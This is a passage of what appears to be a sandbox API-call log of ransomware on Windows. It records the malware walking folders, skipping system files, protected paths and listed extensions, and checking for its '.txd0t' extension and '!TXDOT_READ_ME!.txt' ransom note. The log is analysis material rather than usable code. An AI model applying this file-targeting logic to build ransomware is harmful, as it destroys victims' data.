ftLastAccessTime.dwHighDateTime=0x1cac0d3, ftLastWriteTime.dwLowDateTime=0x69d9e300, ftLastWriteTime.dwHighDateTime=0x1cac0d3, nFileSizeHigh=0x0, nFileSizeLow=0xfaf, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="eula.rtf", cAlternateFileName="")) returned 1 [0086.484] StrCmpW (psz1="eula.rtf", psz2=".") returned 1 [0086.484] StrCmpW (psz1="eula.rtf", psz2="..") returned 1 [0086.484] StrCpyNW (in: psz1=0xed76e0, psz2="C:\\588bce7c90097ed212\\2070", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\2070") returned="C:\\588bce7c90097ed212\\2070" [0086.484] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\2070", psz2="\\", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\2070\\") returned="C:\\588bce7c90097ed212\\2070\\" [0086.484] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\2070\\", psz2="eula.rtf", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\2070\\eula.rtf") returned="C:\\588bce7c90097ed212\\2070\\eula.rtf" [0086.484] PathFindExtensionW (pszPath="eula.rtf") returned=".rtf" [0086.484] StrCmpW (psz1=".rtf", psz2=".txd0t") returned -1 [0086.484] StrCmpIW (psz1="eula.rtf", psz2="bootsect.bak") returned 1 [0086.484] StrCmpIW (psz1="eula.rtf", psz2="iconcache.db") returned -1 [0086.484] StrCmpIW (psz1="eula.rtf", psz2="thumbs.db") returned -1 [0086.484] StrCmpIW (psz1="eula.rtf", psz2=" ransomware ") returned 1 [0086.484] StrCmpIW (psz1="eula.rtf", psz2=" ransom ") returned 1 [0086.484] StrCmpIW (psz1="eula.rtf", psz2="debug.txt") returned 1 [0086.484] StrCmpIW (psz1="eula.rtf", psz2="boot.ini") returned 1 [0086.484] StrCmpIW (psz1="eula.rtf", psz2="desktop.ini") returned 1 [0086.484] StrCmpIW (psz1="eula.rtf", psz2="autorun.inf") returned 1 [0086.484] StrCmpIW (psz1="eula.rtf", psz2="ntuser.dat") returned -1 [0086.484] StrCmpIW (psz1="eula.rtf", psz2="ntldr") returned -1 [0086.484] StrCmpIW (psz1="eula.rtf", psz2="ntdetect.com") returned -1 [0086.484] StrCmpIW (psz1="eula.rtf", psz2="bootfont.bin") returned 1 [0086.484] StrCmpIW (psz1="eula.rtf", psz2="!TXDOT_READ_ME!.txt") returned 1 [0086.484] PathFindExtensionW (pszPath="eula.rtf") returned=".rtf" [0086.484] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".rtf") returned 0x0 [0086.484] WaitForMultipleObjects (nCount=0x4, lpHandles=0xe9f390*=0x3f8, bWaitAll=0, dwMilliseconds=0xffffffff) returned 0x2 [0086.619] StrCpyW (in: psz1=0xeafb88, psz2="\\\\?\\" | out: psz1="\\\\?\\") returned="\\\\?\\" [0086.619] StrNCatW (in: psz1="\\\\?\\", psz2="C:\\588bce7c90097ed212\\2070\\eula.rtf", cchMax=32000 | out: psz1="\\\\?\\C:\\588bce7c90097ed212\\2070\\eula.rtf") returned="\\\\?\\C:\\588bce7c90097ed212\\2070\\eula.rtf" [0086.619] SetEvent (hEvent=0x410) returned 1 [0086.619] FindNextFileW (in: hFindFile=0xec2130, lpFindFileData=0x561f4c0 | out: lpFindFileData=0x561f4c0*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5398dc00, ftCreationTime.dwHighDateTime=0x1cac6fe, ftLastAccessTime.dwLowDateTime=0x5398dc00, ftLastAccessTime.dwHighDateTime=0x1cac6fe, ftLastWriteTime.dwLowDateTime=0x5398dc00, ftLastWriteTime.dwHighDateTime=0x1cac6fe, nFileSizeHigh=0x0, nFileSizeLow=0x1397e, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="LocalizedData.xml", cAlternateFileName="LOCALI~1.XML")) returned 1 [0086.619] StrCmpW (psz1="LocalizedData.xml", psz2=".") returned 1 [0086.619] StrCmpW (psz1="LocalizedData.xml", psz2="..") returned 1 [0086.619] StrCpyNW (in: psz1=0xed76e0, psz2="C:\\588bce7c90097ed212\\2070", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\2070") returned="C:\\588bce7c90097ed212\\2070" [0086.619] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\2070", psz2="\\", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\2070\\") returned="C:\\588bce7c90097ed212\\2070\\" [0086.620] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\2070\\", psz2="LocalizedData.xml", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\2070\\LocalizedData.xml") returned="C:\\588bce7c90097ed212\\2070\\LocalizedData.xml" [0086.620] PathFindExtensionW (pszPath="LocalizedData.xml") returned=".xml" [0086.620] StrCmpW (psz1=".xml", psz2=".txd0t") returned 1 [0086.620] StrCmpIW (psz1="LocalizedData.xml", psz2="bootsect.bak") returned 1 [0086.620] StrCmpIW (psz1="LocalizedData.xml", psz2="iconcache.db") returned 1 [0086.620] StrCmpIW (psz1="LocalizedData.xml", psz2="thumbs.db") returned -1 [0086.620] StrCmpIW (psz1="LocalizedData.xml", psz2=" ransomware ") returned 1 [0086.620] StrCmpIW (psz1="LocalizedData.xml", psz2=" ransom ") returned 1 [0086.620] StrCmpIW (psz1="LocalizedData.xml", psz2="debug.txt") returned 1 [0086.620] StrCmpIW (psz1="LocalizedData.xml", psz2="boot.ini") returned 1 [0086.620] StrCmpIW (psz1="LocalizedData.xml", psz2="desktop.ini") returned 1 [0086.620] StrCmpIW (psz1="LocalizedData.xml", psz2="autorun.inf") returned 1 [0086.620] StrCmpIW (psz1="LocalizedData.xml", psz2="ntuser.dat") returned -1 [0086.620] StrCmpIW (psz1="LocalizedData.xml", psz2="ntldr") returned -1 [0086.620] StrCmpIW (psz1="LocalizedData.xml", psz2="ntdetect.com") returned -1 [0086.620] StrCmpIW (psz1="LocalizedData.xml", psz2="bootfont.bin") returned 1 [0086.620] StrCmpIW (psz1="LocalizedData.xml", psz2="!TXDOT_READ_ME!.txt") returned 1 [0086.620] PathFindExtensionW (pszPath="LocalizedData.xml") returned=".xml" [0086.620] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".xml") returned 0x0 [0086.620] WaitForMultipleObjects (nCount=0x4, lpHandles=0xe9f390*=0x3f8, bWaitAll=0, dwMilliseconds=0xffffffff) returned 0x1 [0086.628] StrCpyW (in: psz1=0xea7e00, psz2="\\\\?\\" | out: psz1="\\\\?\\") returned="\\\\?\\" [0086.628] StrNCatW (in: psz1="\\\\?\\", psz2="C:\\588bce7c90097ed212\\2070\\LocalizedData.xml", cchMax=32000 | out: psz1="\\\\?\\C:\\588bce7c90097ed212\\2070\\LocalizedData.xml") returned="\\\\?\\C:\\588bce7c90097ed212\\2070\\LocalizedData.xml" [0086.628] SetEvent (hEvent=0x408) returned 1 [0086.628] FindNextFileW (in: hFindFile=0xec2130, lpFindFileData=0x561f4c0 | out: lpFindFileData=0x561f4c0*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4958, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 1 [0086.628] StrCmpW (psz1="SetupResources.dll", psz2=".") returned 1 [0086.628] StrCmpW (psz1="SetupResources.dll", psz2="..") returned 1 [0086.628] StrCpyNW (in: psz1=0xed76e0, psz2="C:\\588bce7c90097ed212\\2070", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\2070") returned="C:\\588bce7c90097ed212\\2070" [0086.628] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\2070", psz2="\\", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\2070\\") returned="C:\\588bce7c90097ed212\\2070\\" [0086.628] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\2070\\", psz2="SetupResources.dll", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\2070\\SetupResources.dll") returned="C:\\588bce7c90097ed212\\2070\\SetupResources.dll" [0086.628] PathFindExtensionW (pszPath="SetupResources.dll") returned=".dll" [0086.628] StrCmpW (psz1=".dll", psz2=".txd0t") returned -1 [0086.628] StrCmpIW (psz1="SetupResources.dll", psz2="bootsect.bak") returned 1 [0086.628] StrCmpIW (psz1="SetupResources.dll", psz2="iconcache.db") returned 1 [0086.628] StrCmpIW (psz1="SetupResources.dll", psz2="thumbs.db") returned -1 [0086.628] StrCmpIW (psz1="SetupResources.dll", psz2=" ransomware ") returned 1 [0086.628] StrCmpIW (psz1="SetupResources.dll", psz2=" ransom ") returned 1 [0086.628] StrCmpIW (psz1="SetupResources.dll", psz2="debug.txt") returned 1 [0086.628] StrCmpIW (psz1="SetupResources.dll", psz2="boot.ini") returned 1 [0086.628] StrCmpIW (psz1="SetupResources.dll", psz2="desktop.ini") returned 1 [0086.629] StrCmpIW (psz1="SetupResources.dll", psz2="autorun.inf") returned 1 [0086.629] StrCmpIW (psz1="SetupResources.dll", psz2="ntuser.dat") returned 1 [0086.629] StrCmpIW (psz1="SetupResources.dll", psz2="ntldr") returned 1 [0086.629] StrCmpIW (psz1="SetupResources.dll", psz2="ntdetect.com") returned 1 [0086.629] StrCmpIW (psz1="SetupResources.dll", psz2="bootfont.bin") returned 1 [0086.629] StrCmpIW (psz1="SetupResources.dll", psz2="!TXDOT_READ_ME!.txt") returned 1 [0086.629] PathFindExtensionW (pszPath="SetupResources.dll") returned=".dll" [0086.629] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".dll") returned=".dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui" [0086.629] FindNextFileW (in: hFindFile=0xec2130, lpFindFileData=0x561f4c0 | out: lpFindFileData=0x561f4c0*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4958, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 0 [0086.629] FindClose (in: hFindFile=0xec2130 | out: hFindFile=0xec2130) returned 1 [0086.631] GetProcessHeap () returned 0xe30000 [0086.632] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xed76e0 | out: hHeap=0xe30000) returned 1 [0086.632] FindNextFileW (in: hFindFile=0xec2430, lpFindFileData=0x561f770 | out: lpFindFileData=0x561f770*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf37db23a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="3076", cAlternateFileName="")) returned 1 [0086.632] StrCmpW (psz1="3076", psz2=".") returned 1 [0086.632] StrCmpW (psz1="3076", psz2="..") returned 1 [0086.632] StrCpyNW (in: psz1=0xed3e88, psz2="C:\\588bce7c90097ed212", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212") returned="C:\\588bce7c90097ed212" [0086.632] StrNCatW (in: psz1="C:\\588bce7c90097ed212", psz2="\\", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212\\") returned="C:\\588bce7c90097ed212\\" [0086.632] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\", psz2="3076", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212\\3076") returned="C:\\588bce7c90097ed212\\3076" [0086.632] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\3076", lpSrch="\\windows\\system32\\") returned 0x0 [0086.632] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\3076", lpSrch="\\windows\\syswow64\\") returned 0x0 [0086.632] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\3076", lpSrch="\\windows\\system\\") returned 0x0 [0086.632] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\3076", lpSrch="\\windows\\winsxs\\") returned 0x0 [0086.632] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\3076", lpSrch="\\appdata\\roaming\\") returned 0x0 [0086.632] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\3076", lpSrch="\\appdata\\local\\") returned 0x0 [0086.632] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\3076", lpSrch="\\appdata\\locallow\\") returned 0x0 [0086.632] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\3076", lpSrch="\\all users\\microsoft\\") returned 0x0 [0086.632] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\3076", lpSrch="\\inetpub\\logs\\") returned 0x0 [0086.632] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\3076", lpSrch=":\\boot\\") returned 0x0 [0086.632] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\3076", lpSrch=":\\perflogs\\") returned 0x0 [0086.632] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\3076", lpSrch=":\\programdata\\") returned 0x0 [0086.632] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\3076", lpSrch=":\\drivers\\") returned 0x0 [0086.632] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\3076", lpSrch=":\\wsus\\") returned 0x0 [0086.632] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\3076", lpSrch=":\\efstmpwp\\") returned 0x0 [0086.632] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\3076", lpSrch=":\\$recycle.bin\\") returned 0x0 [0086.632] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\3076", lpSrch="crypt_detect") returned 0x0 [0086.632] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\3076", lpSrch="cryptolocker") returned 0x0 [0086.632] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\3076", lpSrch="ransomware") returned 0x0 [0086.632] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\3076", lpSrch="C:\\WINDOWS") returned 0x0 [0086.632] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\3076", lpSrch="C:\\Program Files (x86)") returned 0x0 [0086.632] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\3076", lpSrch="C:\\Program Files") returned 0x0 [0086.632] GetProcessHeap () returned 0xe30000 [0086.632] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x4b6) returned 0xed76e0 [0086.632] StrCpyNW (in: psz1=0xed76e0, psz2="C:\\588bce7c90097ed212\\3076", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\3076") returned="C:\\588bce7c90097ed212\\3076" [0086.633] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\3076", psz2="\\*", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\3076\\*") returned="C:\\588bce7c90097ed212\\3076\\*" [0086.633] FindFirstFileW (in: lpFileName="C:\\588bce7c90097ed212\\3076\\*", lpFindFileData=0x561f4c0 | out: lpFindFileData=0x561f4c0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf37db23a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xec2630 [0086.633] StrCmpW (psz1=".", psz2=".") returned 0 [0086.633] FindNextFileW (in: hFindFile=0xec2630, lpFindFileData=0x561f4c0 | out: lpFindFileData=0x561f4c0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf37db23a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0086.633] StrCmpW (psz1="..", psz2=".") returned 1 [0086.633] StrCmpW (psz1="..", psz2="..") returned 0 [0086.633] FindNextFileW (in: hFindFile=0xec2630, lpFindFileData=0x561f4c0 | out: lpFindFileData=0x561f4c0*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x69d9e300, ftCreationTime.dwHighDateTime=0x1cac0d3, ftLastAccessTime.dwLowDateTime=0x69d9e300, ftLastAccessTime.dwHighDateTime=0x1cac0d3, ftLastWriteTime.dwLowDateTime=0x69d9e300, ftLastWriteTime.dwHighDateTime=0x1cac0d3, nFileSizeHigh=0x0, nFileSizeLow=0x18a5, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="eula.rtf", cAlternateFileName="")) returned 1 [0086.633] StrCmpW (psz1="eula.rtf", psz2=".") returned 1 [0086.633] StrCmpW (psz1="eula.rtf", psz2="..") returned 1 [0086.633] StrCpyNW (in: psz1=0xed76e0, psz2="C:\\588bce7c90097ed212\\3076", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\3076") returned="C:\\588bce7c90097ed212\\3076" [0086.633] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\3076", psz2="\\", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\3076\\") returned="C:\\588bce7c90097ed212\\3076\\" [0086.633] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\3076\\", psz2="eula.rtf", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\3076\\eula.rtf") returned="C:\\588bce7c90097ed212\\3076\\eula.rtf" [0086.633] PathFindExtensionW (pszPath="eula.rtf") returned=".rtf" [0086.633] StrCmpW (psz1=".rtf", psz2=".txd0t") returned -1 [0086.633] StrCmpIW (psz1="eula.rtf", psz2="bootsect.bak") returned 1 [0086.633] StrCmpIW (psz1="eula.rtf", psz2="iconcache.db") returned -1 [0086.633] StrCmpIW (psz1="eula.rtf", psz2="thumbs.db") returned -1 [0086.633] StrCmpIW (psz1="eula.rtf", psz2=" ransomware ") returned 1 [0086.633] StrCmpIW (psz1="eula.rtf", psz2=" ransom ") returned 1 [0086.633] StrCmpIW (psz1="eula.rtf", psz2="debug.txt") returned 1 [0086.633] StrCmpIW (psz1="eula.rtf", psz2="boot.ini") returned 1 [0086.633] StrCmpIW (psz1="eula.rtf", psz2="desktop.ini") returned 1 [0086.633] StrCmpIW (psz1="eula.rtf", psz2="autorun.inf") returned 1 [0086.633] StrCmpIW (psz1="eula.rtf", psz2="ntuser.dat") returned -1 [0086.633] StrCmpIW (psz1="eula.rtf", psz2="ntldr") returned -1 [0086.633] StrCmpIW (psz1="eula.rtf", psz2="ntdetect.com") returned -1 [0086.633] StrCmpIW (psz1="eula.rtf", psz2="bootfont.bin") returned 1 [0086.633] StrCmpIW (psz1="eula.rtf", psz2="!TXDOT_READ_ME!.txt") returned 1 [0086.633] PathFindExtensionW (pszPath="eula.rtf") returned=".rtf" [0086.634] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".rtf") returned 0x0 [0086.634] WaitForMultipleObjects (nCount=0x4, lpHandles=0xe9f390*=0x3f8, bWaitAll=0, dwMilliseconds=0xffffffff) returned 0x3 [0086.667] StrCpyW (in: psz1=0xeb7910, psz2="\\\\?\\" | out: psz1="\\\\?\\") returned="\\\\?\\" [0086.668] StrNCatW (in: psz1="\\\\?\\", psz2="C:\\588bce7c90097ed212\\3076\\eula.rtf", cchMax=32000 | out: psz1="\\\\?\\C:\\588bce7c90097ed212\\3076\\eula.rtf") returned="\\\\?\\C:\\588bce7c90097ed212\\3076\\eula.rtf" [0086.668] SetEvent (hEvent=0x418) returned 1 [0086.668] FindNextFileW (in: hFindFile=0xec2630, lpFindFileData=0x561f4c0 | out: lpFindFileData=0x561f4c0*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5398dc00, ftCreationTime.dwHighDateTime=0x1cac6fe, ftLastAccessTime.dwLowDateTime=0x5398dc00, ftLastAccessTime.dwHighDateTime=0x1cac6fe, ftLastWriteTime.dwLowDateTime=0x5398dc00, ftLastWriteTime.dwHighDateTime=0x1cac6fe, nFileSizeHigh=0x0, nFileSizeLow=0xed90, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="LocalizedData.xml", cAlternateFileName="LOCALI~1.XML")) returned 1 [0086.668] StrCmpW (psz1="LocalizedData.xml", psz2=".") returned 1 [0086.668] StrCmpW (psz1="LocalizedData.xml", psz2="..") returned 1 [0086.668] StrCpyNW (in: psz1=0xed76e0, psz2="C:\\588bce7c90097ed212\\3076", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\3076") returned="C:\\588bce7c90097ed212\\3076" [0086.668] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\3076", psz2="\\", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\3076\\") returned="C:\\588bce7c90097ed212\\3076\\" [0086.668] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\3076\\", psz2="LocalizedData.xml", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\3076\\LocalizedData.xml") returned="C:\\588bce7c90097ed212\\3076\\LocalizedData.xml" [0086.668] PathFindExtensionW (pszPath="LocalizedData.xml") returned=".xml" [0086.668] StrCmpW (psz1=".xml", psz2=".txd0t") returned 1 [0086.668] StrCmpIW (psz1="LocalizedData.xml", psz2="bootsect.bak") returned 1 [0086.668] StrCmpIW (psz1="LocalizedData.xml", psz2="iconcache.db") returned 1 [0086.668] StrCmpIW (psz1="LocalizedData.xml", psz2="thumbs.db") returned -1 [0086.668] StrCmpIW (psz1="LocalizedData.xml", psz2=" ransomware ") returned 1 [0086.668] StrCmpIW (psz1="LocalizedData.xml", psz2=" ransom ") returned 1 [0086.668] StrCmpIW (psz1="LocalizedData.xml", psz2="debug.txt") returned 1 [0086.668] StrCmpIW (psz1="LocalizedData.xml", psz2="boot.ini") returned 1 [0086.668] StrCmpIW (psz1="LocalizedData.xml", psz2="desktop.ini") returned 1 [0086.668] StrCmpIW (psz1="LocalizedData.xml", psz2="autorun.inf") returned 1 [0086.668] StrCmpIW (psz1="LocalizedData.xml", psz2="ntuser.dat") returned -1 [0086.668] StrCmpIW (psz1="LocalizedData.xml", psz2="ntldr") returned -1 [0086.668] StrCmpIW (psz1="LocalizedData.xml", psz2="ntdetect.com") returned -1 [0086.668] StrCmpIW (psz1="LocalizedData.xml", psz2="bootfont.bin") returned 1 [0086.668] StrCmpIW (psz1="LocalizedData.xml", psz2="!TXDOT_READ_ME!.txt") returned 1 [0086.668] PathFindExtensionW (pszPath="LocalizedData.xml") returned=".xml" [0086.668] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".xml") returned 0x0 [0086.668] WaitForMultipleObjects (nCount=0x4, lpHandles=0xe9f390*=0x3f8, bWaitAll=0, dwMilliseconds=0xffffffff) returned 0x2 [0086.724] StrCpyW (in: psz1=0xeafb88, psz2="\\\\?\\" | out: psz1="\\\\?\\") returned="\\\\?\\" [0086.724] StrNCatW (in: psz1="\\\\?\\", psz2="C:\\588bce7c90097ed212\\3076\\LocalizedData.xml", cchMax=32000 | out: psz1="\\\\?\\C:\\588bce7c90097ed212\\3076\\LocalizedData.xml") returned="\\\\?\\C:\\588bce7c90097ed212\\3076\\LocalizedData.xml" [0086.724] SetEvent (hEvent=0x410) returned 1 [0086.724] FindNextFileW (in: hFindFile=0xec2630, lpFindFileData=0x561f4c0 | out: lpFindFileData=0x561f4c0*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x3758, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 1 [0086.724] StrCmpW (psz1="SetupResources.dll", psz2=".") returned 1 [0086.724] StrCmpW (psz1="SetupResources.dll", psz2="..") returned 1 [0086.724] StrCpyNW (in: psz1=0xed76e0, psz2="C:\\588bce7c90097ed212\\3076", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\3076") returned="C:\\588bce7c90097ed212\\3076" [0086.725] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\3076", psz2="\\", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\3076\\") returned="C:\\588bce7c90097ed212\\3076\\" [0086.725] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\3076\\", psz2="SetupResources.dll", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\3076\\SetupResources.dll") returned="C:\\588bce7c90097ed212\\3076\\SetupResources.dll" [0086.725] PathFindExtensionW (pszPath="SetupResources.dll") returned=".dll" [0086.725] StrCmpW (psz1=".dll", psz2=".txd0t") returned -1 [0086.725] StrCmpIW (psz1="SetupResources.dll", psz2="bootsect.bak") returned 1 [0086.725] StrCmpIW (psz1="SetupResources.dll", psz2="iconcache.db") returned 1 [0086.725] StrCmpIW (psz1="SetupResources.dll", psz2="thumbs.db") returned -1 [0086.725] StrCmpIW (psz1="SetupResources.dll", psz2=" ransomware ") returned 1 [0086.725] StrCmpIW (psz1="SetupResources.dll", psz2=" ransom ") returned 1 [0086.725] StrCmpIW (psz1="SetupResources.dll", psz2="debug.txt") returned 1 [0086.725] StrCmpIW (psz1="SetupResources.dll", psz2="boot.ini") returned 1 [0086.725] StrCmpIW (psz1="SetupResources.dll", psz2="desktop.ini") returned 1 [0086.725] StrCmpIW (psz1="SetupResources.dll", psz2="autorun.inf") returned 1 [0086.725] StrCmpIW (psz1="SetupResources.dll", psz2="ntuser.dat") returned 1 [0086.725] StrCmpIW (psz1="SetupResources.dll", psz2="ntldr") returned 1 [0086.725] StrCmpIW (psz1="SetupResources.dll", psz2="ntdetect.com") returned 1 [0086.725] StrCmpIW (psz1="SetupResources.dll", psz2="bootfont.bin") returned 1 [0086.725] StrCmpIW (psz1="SetupResources.dll", psz2="!TXDOT_READ_ME!.txt") returned 1 [0086.725] PathFindExtensionW (pszPath="SetupResources.dll") returned=".dll" [0086.725] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".dll") returned=".dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui" [0086.725] FindNextFileW (in: hFindFile=0xec2630, lpFindFileData=0x561f4c0 | out: lpFindFileData=0x561f4c0*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, 